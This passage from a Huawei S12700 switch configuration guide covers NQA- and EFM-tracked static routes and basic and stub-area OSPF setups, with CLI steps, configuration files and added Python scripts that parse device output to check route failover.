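1 . Test 309 result The test is finished
Send operation times: 2 Receive response times: 0
Completion:failed RTD OverThresholds number: 0
Attempts number:1 Drop operation number:2
Disconnect operation number:0 Operation timeout number:0
System busy operation number:0 Connection fail number:0
Operation sequence errors number:0 RTT Status errors number:0
Destination ip address:192.168.1.2
Min/Max/Average Completion Time: 0/0/0
Sum/Square-Sum Completion Time: 0/0
Last Good Probe Time: 0000-00-00 00:00:00.0
Lost packet ratio: 100 %
"""


@dataclass
class NqaResult:
    admin: str          # administrator name of the test instance ("user")
    name: str           # test instance name ("test")
    test_type: str      # "icmp" in this example
    destination: str
    sent: int
    received: int
    completion: str     # "success" or "failed"
    loss_percent: int


_PATTERNS = {
    "head": r"NQA entry\((\w+), (\w+)\) :testflag is \w+ ,testtype is (\w+)",
    "destination": r"Destination ip address:\s*(\S+)",
    "sent": r"Send operation times:\s*(\d+)",
    "received": r"Receive response times:\s*(\d+)",
    "completion": r"Completion:\s*(\w+)",
    "loss": r"Lost packet ratio:\s*(\d+)\s*%",
}


def parse_nqa_results(text: str) -> NqaResult:
    """Pull the fields an operator looks at out of the free-form output."""
    found = {}
    for key, pattern in _PATTERNS.items():
        m = re.search(pattern, text)
        if m is None:
            raise ValueError(f"field '{key}' not found in NQA output")
        found[key] = m
    head = found["head"]
    return NqaResult(
        admin=head.group(1), name=head.group(2), test_type=head.group(3),
        destination=found["destination"].group(1),
        sent=int(found["sent"].group(1)), received=int(found["received"].group(1)),
        completion=found["completion"].group(1),
        loss_percent=int(found["loss"].group(1)),
    )


def link_is_up(result: NqaResult) -> bool:
    """Decision the page describes: a successful test round keeps the tracked
    static route; a failed round (no replies, 100 % loss) removes it."""
    return result.completion == "success" and result.received > 0


@dataclass
class ExternalRoute:
    advertiser: str
    next_hop: str
    cost: int


def switcha_route(nqa: NqaResult) -> ExternalRoute:
    """Routes SwitchA can learn for 192.168.7.0/24 (values from the page): SwitchB
    redistributes its static route at cost 10 only while NQA reports the link up;
    SwitchC redistributes at cost 20 unconditionally. OSPF keeps the lower cost."""
    candidates: List[ExternalRoute] = [ExternalRoute("SwitchC", "192.168.4.2", 20)]
    if link_is_up(nqa):
        candidates.append(ExternalRoute("SwitchB", "192.168.3.2", 10))
    return min(candidates, key=lambda r: r.cost)


if __name__ == "__main__":
    for label, output in (("link up", NQA_OK), ("link down", NQA_FAIL)):
        result = parse_nqa_results(output)
        chosen = switcha_route(result)
        print(f"{label}: loss {result.loss_percent}% -> via {chosen.advertiser} "
              f"({chosen.next_hop}, cost {chosen.cost})")
```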

----End

Configuration Files
- Configuration file of aggregation switch SwitchA
#
sysname SwitchA
#
vlan batch 30 40
#
interface Vlanif30
ip address 192.168.3.1 255.255.255.0
#
interface Vlanif40
ip address 192.168.4.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 40
#
ospf 1 router-id 10.1.1.1
area 0.0.0.0
network 192.168.3.0 0.0.0.255
network 192.168.4.0 0.0.0.255
#
return
- Configuration file of aggregation switch SwitchB
#
sysname SwitchB
#
vlan batch 10 30 50
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif30
ip address 192.168.3.2 255.255.255.0
#
interface Vlanif50
ip address 192.168.5.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 30
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 50
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 10
#
ospf 1 router-id 10.2.2.2
import-route static cost 10
area 0.0.0.0
network 192.168.3.0 0.0.0.255
#
ip route-static 192.168.7.0 255.255.255.0 Vlanif10 192.168.1.2 track nqa user test
#
nqa test-instance user test
test-type icmp
destination-address ipv4 192.168.1.2
frequency 10
interval seconds 5
timeout 4
probe-count 2
start now
#
return
- Configuration file of aggregation switch SwitchC
#
sysname SwitchC
#
vlan batch 20 40 60
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif40
ip address 192.168.4.2 255.255.255.0
#
interface Vlanif60
ip address 192.168.6.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 40
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 60
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 20
#
ospf 1 router-id 10.3.3.3
import-route static cost 20
area 0.0.0.0
network 192.168.4.0 0.0.0.255
#
ip route-static 192.168.7.0 255.255.255.0 Vlanif60 192.168.6.2
#
return
- Configuration file of access switch SwitchD
#
sysname SwitchD
#
vlan batch 10 60 70
#
interface Vlanif10
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif60
ip address 192.168.6.2 255.255.255.0
#
interface Vlanif70
ip address 192.168.7.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 60
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 70
#
return
- Configuration file of access switch SwitchE
#
sysname SwitchE
#
vlan batch 20 50 80
#
interface Vlanif20
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif50
ip address 192.168.5.2 255.255.255.0
#
interface Vlanif80
ip address 192.168.8.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 20
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 50
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 80
#
return

Relevant Information
Video
How to Configure a Static Route
How to Configure a Default Route
How to Configure a Floating Static Route

9.1.5 Example for Configuring EFM for IPv4 Static Routes


Overview of EFM for IPv4 Static Routes
Ethernet in the first mile (EFM) defines the Ethernet physical-layer specifications for user
access and implements Ethernet management and maintenance, providing link-level operation,
administration, and maintenance (OAM). EFM provides link connectivity detection, link fault
monitoring, remote fault notification, and remote loopback on a link between two
directly connected devices.
Static routes are easy to configure and therefore widely used on networks with simple
structures. Unlike dynamic routing protocols, static routes do not have a dedicated detection
mechanism. If a fault occurs, static routes cannot detect the fault, and the network
administrator must delete the corresponding static route. This delays the link switchover and
may cause lengthy service interruptions. As networks develop quickly, more and more IP
networks are used to carry multiple services such as voice and video services. These services
pose high requirements on network reliability, and fast fault detection and processing. EFM
for IPv4 static routes can be configured to provide the detection mechanism for static routes
so that the static routes can detect the link quality changes in real time and switch services
immediately.

Configuration Notes
- By default, EFM is disabled globally and on interfaces.
- After EFM OAM is enabled on an interface, the interface starts to send OAM PDUs to
perform point-to-point EFM link detection. Link detection between two interfaces works
only after EFM OAM is also enabled on the peer interface.

Networking Requirements
As shown in Figure 9-5, SwitchA connects to the NMS across a network segment through
SwitchB. SwitchA and SwitchB need to detect the link quality in real time. When the link
between them becomes faulty, the corresponding static route is deleted from the IP routing
table. Then traffic switches from the faulty link to a normal route to improve network
reliability.

Figure 9-5 Networking for configuring EFM for a static IPv4 route
(Figure content: SwitchA GE1/0/1 (VLANIF10, 192.168.1.1/24) connects to SwitchB GE1/0/1 (VLANIF10, 192.168.1.2/24); SwitchB GE1/0/2 (VLANIF20, 192.168.2.2/24) connects to the NMS at 192.168.2.1/24.)

Configuration Roadmap
The configuration roadmap is as follows:
1. Enable EFM OAM globally and on the interfaces of SwitchA and SwitchB to implement
real-time link quality detection.
2. Configure a static route from SwitchA to the NMS and bind it to the EFM state of the
interface, so that the static route is associated with EFM. When the link on which the static
route resides becomes faulty, traffic switches to a route without link faults.

Procedure
Step 1 Specify the VLAN to which the interfaces belong.
# Configure SwitchA. The configuration of SwitchB is similar to that of SwitchA.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan 10
[SwitchA-vlan10] quit
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet1/0/1] quit

Step 2 Configure an IP address for each VLANIF interface.


# Configure SwitchA. The configuration of SwitchB is similar to that of SwitchA.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 192.168.1.1 24
[SwitchA-Vlanif10] quit

Step 3 Configure an EFM session between SwitchA and SwitchB.


# Enable EFM OAM on SwitchA.
[SwitchA] efm enable //Enable EFM globally.
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] efm enable //Enable EFM on an interface.
[SwitchA-GigabitEthernet1/0/1] quit

# Enable EFM OAM on SwitchB.


[SwitchB] efm enable //Enable EFM globally.
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] efm enable //Enable EFM on an interface.
[SwitchB-GigabitEthernet1/0/1] quit

Step 4 Configure a static route and bind it to the EFM state.


# Configure a static route from SwitchA to the external network and bind it to the EFM state
of GigabitEthernet1/0/1.
[SwitchA] ip route-static 192.168.2.0 24 192.168.1.2 track efm-state gigabitethernet1/0/1

Step 5 Verify the configuration.


# After the configuration is complete, run the display efm session all command on SwitchA
and SwitchB. The command output shows that an EFM session has been set up and is in detect
mode, that is, the interface is in handshake state. The following uses the display on SwitchA
as an example.
[SwitchA] display efm session all
Interface EFM State Loopback Timeout
----------------------------------------------------------------------
GigabitEthernet1/0/1 detect --

# Check the IP routing table on SwitchA. The IP routing table contains the static route.
[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 5 Routes : 5

Destination/Mask Proto Pre Cost Flags NextHop Interface

127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif10
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
192.168.2.0/24 Static 60 0 RD 192.168.1.2 Vlanif10

# Run the undo efm enable command in the view of GigabitEthernet1/0/1 on SwitchB to
simulate a link fault.
[SwitchB] interface gigabitethernet 1/0/1
[SwitchB-GigabitEthernet1/0/1] undo efm enable

# Run the display efm session all command on SwitchA. The command output shows that the
EFM OAM protocol state is discovery, indicating that the interface is in OAM discovery
state.
[SwitchA] display efm session all
Interface EFM State Loopback Timeout
----------------------------------------------------------------------
GigabitEthernet1/0/1 discovery --

# Check the IP routing table on SwitchA. The IP routing table does not contain the static route
192.168.2.0/24. This is because the static route is bound to the EFM state. After EFM OAM
detects a link fault, it rapidly notifies SwitchA that the static route is unavailable.
[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 4 Routes : 4

Destination/Mask Proto Pre Cost Flags NextHop Interface

127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif10
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10

# Run the efm enable command in the view of GigabitEthernet1/0/1 on SwitchB to simulate
link recovery.
[SwitchB-GigabitEthernet1/0/1] efm enable

# Run the display efm session all command on SwitchA. The command output shows that the
EFM OAM protocol state is detect, indicating that the interface is in handshake state again.
[SwitchA] display efm session all
Interface EFM State Loopback Timeout
----------------------------------------------------------------------
GigabitEthernet1/0/1 detect --


# Check the IP routing table on SwitchA. The IP routing table contains the static route
192.168.2.0/24 again. After EFM OAM detects that the link recovers from a fault, it rapidly
notifies that the bound static route is valid again.
[SwitchA] display ip routing-table
Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 5 Routes : 5

Destination/Mask Proto Pre Cost Flags NextHop Interface

127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif10
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
192.168.2.0/24 Static 60 0 RD 192.168.1.2 Vlanif10

----End
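The verification above is done by eye. As an added check that is not part of the Huawei example, the following Python script parses display efm session all and display ip routing-table output and confirms that a static route bound with track efm-state is installed only while the EFM session on the tracked interface is in detect state; the captured outputs in the script are constructed from this page's listings, and the function names are my own.

```python
"""Check that a static route bound with `track efm-state` follows the EFM
session state, by parsing `display efm session all` and `display ip
routing-table` output.  Added example, not Huawei code; the captured outputs
below are constructed from the listings on this page."""
import re
from dataclasses import dataclass

# One row of `display ip routing-table`: destination/mask, protocol, preference,
# cost, flags, next hop and outgoing interface, separated by whitespace.
ROUTE_RE = re.compile(
    r"^(?P<dest>\d+\.\d+\.\d+\.\d+/\d+)\s+(?P<proto>\w+)\s+(?P<pre>\d+)\s+"
    r"(?P<cost>\d+)\s+(?P<flags>\w+)\s+(?P<nexthop>\S+)\s+(?P<iface>\S+)\s*$",
    re.MULTILINE)


@dataclass(frozen=True)
class Route:
    dest: str
    proto: str
    nexthop: str
    iface: str


def parse_efm_sessions(output):
    """Map interface -> EFM protocol state (discovery/detect) from the session table."""
    sessions, in_body = {}, False
    for line in output.splitlines():
        if line.startswith("----"):        # dashed rule separates header from rows
            in_body = True
        elif in_body and line.split():
            iface, state = line.split()[:2]
            sessions[iface] = state
    return sessions


def parse_routing_table(output):
    """Extract routes from `display ip routing-table` output."""
    return [Route(m["dest"], m["proto"], m["nexthop"], m["iface"])
            for m in ROUTE_RE.finditer(output)]


def tracked_route_consistent(efm_output, route_output, prefix, iface):
    """Return (efm_state, route_installed, consistent).

    A static route bound to the EFM state of `iface` must be installed only
    while the session on that interface is in detect state; any other
    combination means the binding is missing or EFM has not yet converged."""
    state = parse_efm_sessions(efm_output).get(iface, "absent")
    installed = any(r.dest == prefix and r.proto == "Static"
                    for r in parse_routing_table(route_output))
    return state, installed, installed == (state == "detect")


def withdrawn_routes(before, after):
    """Destinations present in the first routing-table snapshot but not the second."""
    kept = {r.dest for r in parse_routing_table(after)}
    return sorted(r.dest for r in parse_routing_table(before) if r.dest not in kept)


# Constructed captures, modelled on the page's SwitchA output before and after
# EFM is disabled on SwitchB's GigabitEthernet1/0/1.
EFM_UP = """Interface EFM State Loopback Timeout
----------------------------------------------------------------------
GigabitEthernet1/0/1 detect --
"""
EFM_DOWN = EFM_UP.replace("detect", "discovery")
ROUTES_UP = """Route Flags: R - relay, D - download to fib
------------------------------------------------------------------------------
Routing Tables: Public
Destinations : 5 Routes : 5

Destination/Mask Proto Pre Cost Flags NextHop Interface

127.0.0.0/8 Direct 0 0 D 127.0.0.1 InLoopBack0
127.0.0.1/32 Direct 0 0 D 127.0.0.1 InLoopBack0
192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif10
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
192.168.2.0/24 Static 60 0 RD 192.168.1.2 Vlanif10
"""
ROUTES_DOWN = ROUTES_UP.replace("192.168.2.0/24 Static 60 0 RD 192.168.1.2 Vlanif10\n", "")
```

A route that stays installed while the session reports discovery (the third combination) is the case an operator wants flagged: it means the route was configured without the track binding, so a link fault would black-hole traffic instead of switching it.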

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 10
#
efm enable
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
efm enable
#
ip route-static 192.168.2.0 255.255.255.0 192.168.1.2 track efm-state GigabitEthernet1/0/1
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 10 20
#
efm enable
#
interface Vlanif10
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif20
ip address 192.168.2.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
efm enable
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
return


Relevant Information
Video

How to Configure a Static Route

How to Configure a Default Route

How to Configure a Floating Static Route

9.2 Typical OSPF Configuration

9.2.1 Example for Configuring Basic OSPF Functions

Introduction to OSPF
The Open Shortest Path First (OSPF) protocol is a link-state Interior Gateway Protocol (IGP)
developed by the Internet Engineering Task Force (IETF). OSPF Version 2 defined in RFC
2328 is used in IPv4.

OSPF is loop-free, provides fast route convergence, and supports area partitioning, equal-cost
routes, authentication, and multicast transmission. Therefore, OSPF is widely used as the
mainstream IGP in various industries, including the enterprise, carrier, government, finance,
education, and health care industries.

OSPF uses a hierarchical design, provides various routing policies, and applies to networks of
different sizes and topologies. OSPF is often the first choice when deploying an IGP.

Configuration Notes
l Each router ID in an OSPF process must be unique on an OSPF network. Otherwise, the
OSPF neighbor relationship cannot be established and routing information is incorrect.
You are advised to configure a unique router ID for each OSPF process on an OSPF
device.
l OSPF partitions an AS into different areas, in which Area 0 is the backbone area. OSPF
requires that all non-backbone areas maintain the connectivity with the backbone area
and devices in the backbone area maintain the connectivity with each other.
l Network types of interfaces on both ends of a link must be the same; otherwise, the two
interfaces cannot establish an OSPF neighbor relationship. When the network types of
OSPF interfaces on both ends are broadcast and P2P respectively, the two OSPF
interfaces can still establish an OSPF neighbor relationship but cannot learn routing
information from each other.
l The IP address masks of OSPF interfaces on both ends of a link must be the same;
otherwise, the two OSPF interfaces cannot establish an OSPF neighbor relationship. On
a P2MP network, however, you can run the ospf p2mp-mask-ignore command to
disable a device from checking the network mask so that an OSPF neighbor relationship
can be established.
l On a broadcast or NBMA network, there must be at least one OSPF interface of which
the DR priority is not 0 to ensure that the DR can be elected. Otherwise, the neighbor
status of devices on both ends can only be 2-Way.
l Table 9-1 lists applicable products and versions of this configuration example.


Table 9-1 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.

Networking Requirements
As shown in Figure 9-6, three switches, SwitchA, SwitchB, and SwitchC reside on the OSPF
network. The three switches need to communicate with each other, and SwitchA and SwitchB
function as core switches to support network expansion.

Figure 9-6 Networking diagram for configuring basic OSPF functions


[Figure: SwitchC (GE1/0/1, VLANIF20, 192.168.1.2/24) - Area 1 - SwitchA (GE1/0/2, VLANIF20, 192.168.1.1/24; GE1/0/1, VLANIF10, 192.168.0.1/24) - Area 0 - SwitchB (GE1/0/1, VLANIF10, 192.168.0.2/24)]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure an IP address for each VLANIF interface on each switch and specify the
VLAN to which the interfaces belong to implement interworking.
2. Configure basic OSPF functions on each switch and partition the OSPF network into
Area 0 and Area 1 with SwitchA as the area border router (ABR). Consequently, the area
where SwitchA and SwitchB reside becomes the backbone area and can be used to
expand the OSPF network.

Procedure
Step 1 Specify the VLANs to which interfaces belong.
# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA, and are not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 10

[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 20
[SwitchA-GigabitEthernet1/0/2] quit

Step 2 Configure an IP address for each VLANIF interface.


# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA, and are not mentioned here.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 192.168.0.1 24
[SwitchA-Vlanif10] quit
[SwitchA] interface vlanif 20
[SwitchA-Vlanif20] ip address 192.168.1.1 24
[SwitchA-Vlanif20] quit

Step 3 Configure basic OSPF functions.


# Configure SwitchA.
[SwitchA] ospf 1 router-id 10.1.1.1 //Create OSPF process 1 with the router ID 10.1.1.1.
[SwitchA-ospf-1] area 0 //Create Area 0 and enter the Area 0 view.
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.0.0 0.0.0.255 //Configure a network segment in Area 0.
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] area 1 //Create Area 1 and enter the Area 1 view.
[SwitchA-ospf-1-area-0.0.0.1] network 192.168.1.0 0.0.0.255 //Configure a network segment in Area 1.
[SwitchA-ospf-1-area-0.0.0.1] return

# Configure SwitchB.
[SwitchB] ospf 1 router-id 10.2.2.2
[SwitchB-ospf-1] area 0
[SwitchB-ospf-1-area-0.0.0.0] network 192.168.0.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.0] return

# Configure SwitchC.
[SwitchC] ospf 1 router-id 10.3.3.3
[SwitchC-ospf-1] area 1
[SwitchC-ospf-1-area-0.0.0.1] network 192.168.1.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.1] return

Step 4 Verify the configuration.


# Check information about OSPF neighbors of SwitchA.
<SwitchA> display ospf peer

OSPF Process 1 with Router ID 10.1.1.1


Neighbors

Area 0.0.0.0 interface 192.168.0.1(Vlanif10)'s neighbors


Router ID: 10.2.2.2 Address: 192.168.0.2
State: Full Mode:Nbr is Master Priority: 1
DR: 192.168.0.2 BDR: 192.168.0.1 MTU: 0
Dead timer due in 36 sec
Retrans timer interval: 5
Neighbor is up for 00:15:04
Authentication Sequence: [ 0 ]

Neighbors

Area 0.0.0.1 interface 192.168.1.1(Vlanif20)'s neighbors


Router ID: 10.3.3.3 Address: 192.168.1.2

State: Full Mode:Nbr is Master Priority: 1
DR: 192.168.1.2 BDR: 192.168.1.1 MTU: 0
Dead timer due in 39 sec
Retrans timer interval: 5
Neighbor is up for 00:07:32
Authentication Sequence: [ 0 ]

# Check OSPF routing information on SwitchC.


<SwitchC> display ospf routing

OSPF Process 1 with Router ID 10.3.3.3


Routing Tables

Routing for Network


Destination Cost Type NextHop AdvRouter Area
192.168.1.0/24 1 Transit 192.168.1.2 10.3.3.3 0.0.0.1
192.168.0.0/24 2 Inter-area 192.168.1.1 10.1.1.1 0.0.0.1

Total Nets: 2
Intra Area: 1 Inter Area: 1 ASE: 0 NSSA: 0

The preceding command output shows that SwitchC has a route to 192.168.0.0/24 and the
route is an inter-area route.
# Check the routing table on SwitchB and perform the ping operation to test the connectivity
between SwitchB and SwitchC.
<SwitchB> display ospf routing

OSPF Process 1 with Router ID 10.2.2.2


Routing Tables

Routing for Network


Destination Cost Type NextHop AdvRouter Area
192.168.0.0/24 1 Transit 192.168.0.2 10.2.2.2 0.0.0.0
192.168.1.0/24 2 Inter-area 192.168.0.1 10.1.1.1 0.0.0.0

Total Nets: 2
Intra Area: 1 Inter Area: 1 ASE: 0 NSSA: 0

The preceding command output shows that SwitchB has a route to 192.168.1.0/24 and the
route is an inter-area route.
# On SwitchB, perform a ping operation to test the connectivity between SwitchB and
SwitchC.
<SwitchB> ping 192.168.1.2
PING 192.168.1.2: 56 data bytes, press CTRL_C to break
Reply from 192.168.1.2: bytes=56 Sequence=1 ttl=254 time=62 ms
Reply from 192.168.1.2: bytes=56 Sequence=2 ttl=254 time=16 ms
Reply from 192.168.1.2: bytes=56 Sequence=3 ttl=254 time=62 ms
Reply from 192.168.1.2: bytes=56 Sequence=4 ttl=254 time=94 ms
Reply from 192.168.1.2: bytes=56 Sequence=5 ttl=254 time=63 ms

--- 192.168.1.2 ping statistics ---


5 packet(s) transmitted
5 packet(s) received
0.00% packet loss
round-trip min/avg/max = 16/59/94 ms

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA

#
vlan batch 10 20
#
interface Vlanif10
ip address 192.168.0.1 255.255.255.0
#
interface Vlanif20
ip address 192.168.1.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 20
#
ospf 1 router-id 10.1.1.1
area 0.0.0.0
network 192.168.0.0 0.0.0.255
area 0.0.0.1
network 192.168.1.0 0.0.0.255
#
return

l Configuration file of SwitchB


#
sysname SwitchB
#
vlan batch 10
#
interface Vlanif10
ip address 192.168.0.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 10
#
ospf 1 router-id 10.2.2.2
area 0.0.0.0
network 192.168.0.0 0.0.0.255
#
return

l Configuration file of SwitchC


#
sysname SwitchC
#
vlan batch 20
#
interface Vlanif20
ip address 192.168.1.2 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 20
#
ospf 1 router-id 10.3.3.3
area 0.0.0.1
network 192.168.1.0 0.0.0.255
#
return


9.2.2 Example for Configuring an OSPF Stub Area

Introduction to a Stub Area


A stub area is an area that does not allow an ABR to advertise received AS external routes. In
a stub area, the routing table size and transmitted routing information volume of routers are
greatly reduced. A stub area is often placed at the edge of an AS. To ensure the reachability of
a destination outside the AS, the ABR in the stub area generates a default route and advertises
it to the non-ABR routers in the stub area.

Assume that a device of Company H connects to the backbone area through a single link. The
device has low performance and a small routing table. The area where the device resides
needs to access other areas or network segments outside the OSPF area, and because the device
has only that one uplink, the next hop of every route on it is the IP address of the core device
at the other end of the link. Therefore, the area where the device resides does not need to learn
a large number of OSPF external routes and can be configured as a stub area. This
configuration reduces the routing table size in the area and the resource consumption of the device.

Configuration Notes
l The backbone area cannot be configured as a stub area.
l An ASBR cannot exist in a stub area. That is, external routes are not advertised in a stub
area.
l A virtual link cannot pass through a stub area.
l To configure an area as a stub area, configure stub area attributes on all the routers in this
area using the stub command.
l To configure an area as a totally stub area, run the stub command on all the routers in
this area, and run the stub no-summary command on the ABR in this area.
l The stub no-summary command can only be configured on an ABR to prevent the
ABR from advertising Type 3 LSAs within a stub area. After this command is
configured on the ABR, the area becomes a totally stub area, the number of routing
entries on routers in the area is reduced, and there are only intra-area routes and a default
route advertised by the ABR.
l Table 9-2 lists applicable products and versions of this configuration example.

Table 9-2 Applicable product models and versions

Product   Product Model        Software Version
S12700    S12708 and S12712    V200R005C00, V200R006C00, V200R007C00, V200R007C20, V200R008C00, V200R009C00
          S12704               V200R008C00, V200R009C00

NOTE
To know details about software mappings, see Switch Software Mapping Search.


Networking Requirements
As shown in Figure 9-7, SwitchA, SwitchB, and SwitchC run OSPF, and the OSPF network
is divided into Area 0 and Area 1. SwitchB functions as an ASBR to communicate with
external networks. The OSPF routing table size on SwitchC needs to be reduced without
affecting communication.

Figure 9-7 Networking diagram for OSPF stub area configuration


[Figure: SwitchC (GE1/0/1, VLANIF20, 192.168.1.2/24) - Area 1 (Stub) - SwitchA (GE1/0/2, VLANIF20, 192.168.1.1/24; GE1/0/1, VLANIF10, 192.168.0.1/24) - Area 0 - SwitchB, ASBR (GE1/0/1, VLANIF10, 192.168.0.2/24)]

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure basic OSPF functions on each switch to implement interworking in the OSPF
network.
2. Configure a static route on SwitchB and import the route to the OSPF routing table to
ensure that there is a reachable route from the OSPF network to external networks.
3. Configure Area 1 as a stub area to reduce the OSPF routing table size on SwitchC.
4. Prohibit the ABR (SwitchA) in Area 1 from advertising Type 3 LSAs within the stub
area to configure Area 1 as a totally stub area. This configuration minimizes the OSPF
routing table size on SwitchC.

Procedure
Step 1 Specify the VLANs to which interfaces belong.
# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA, and are not mentioned here.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 10 20
[SwitchA] interface gigabitethernet 1/0/1
[SwitchA-GigabitEthernet1/0/1] port link-type trunk
[SwitchA-GigabitEthernet1/0/1] port trunk allow-pass vlan 10
[SwitchA-GigabitEthernet1/0/1] quit
[SwitchA] interface gigabitethernet 1/0/2
[SwitchA-GigabitEthernet1/0/2] port link-type trunk
[SwitchA-GigabitEthernet1/0/2] port trunk allow-pass vlan 20
[SwitchA-GigabitEthernet1/0/2] quit

Step 2 Configure an IP address for each VLANIF interface.


# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA, and are not mentioned here.
[SwitchA] interface vlanif 10
[SwitchA-Vlanif10] ip address 192.168.0.1 24

[SwitchA-Vlanif10] quit
[SwitchA] interface vlanif 20
[SwitchA-Vlanif20] ip address 192.168.1.1 24
[SwitchA-Vlanif20] quit

Step 3 Configure basic OSPF functions.


# Configure SwitchA.
[SwitchA] ospf 1 router-id 10.1.1.1
[SwitchA-ospf-1] area 0
[SwitchA-ospf-1-area-0.0.0.0] network 192.168.0.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.0] quit
[SwitchA-ospf-1] area 1
[SwitchA-ospf-1-area-0.0.0.1] network 192.168.1.0 0.0.0.255
[SwitchA-ospf-1-area-0.0.0.1] quit
[SwitchA-ospf-1] quit

# Configure SwitchB.
[SwitchB] ospf 1 router-id 10.2.2.2
[SwitchB-ospf-1] area 0
[SwitchB-ospf-1-area-0.0.0.0] network 192.168.0.0 0.0.0.255
[SwitchB-ospf-1-area-0.0.0.0] quit
[SwitchB-ospf-1] quit

# Configure SwitchC.
[SwitchC] ospf 1 router-id 10.3.3.3
[SwitchC-ospf-1] area 1
[SwitchC-ospf-1-area-0.0.0.1] network 192.168.1.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.1] quit
[SwitchC-ospf-1] quit

Step 4 Configure SwitchB to import a static route.


[SwitchB] ip route-static 10.0.0.0 8 null 0
[SwitchB] ospf 1
